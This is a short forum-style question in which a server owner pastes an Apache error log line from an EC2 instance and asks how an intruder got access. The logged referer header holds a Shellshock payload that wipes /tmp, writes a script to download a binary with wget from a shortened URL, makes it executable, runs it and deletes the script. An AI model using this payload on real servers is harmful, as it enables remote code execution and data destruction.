I was looking through my logs and I noticed a very weird line.
[Fri Jun 26 21:21:36.420706 2015] [:error] [pid 21172] [client 58.213.123.107:56538] Target WSGI script not found or unable to stat: /opt/python/current/app/application.py, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://ift.tt/1fLAU4e -O /tmp/China.Z-foxr >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-foxr >> /tmp/Run.sh;echo /tmp/China.Z-foxr >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Looks like someone was abl to upload a file, change it to 777, run it and remove it all from the /tmp/ folder.
I'm very confused since it requires a auth file from Amazon to be able to connect to the ec2 instance by SSH and I doubt that they got access to this file.
Is there any other way they could have got access? Could there be some permissions settings that are wrong on my instance?
Aucun commentaire:
Enregistrer un commentaire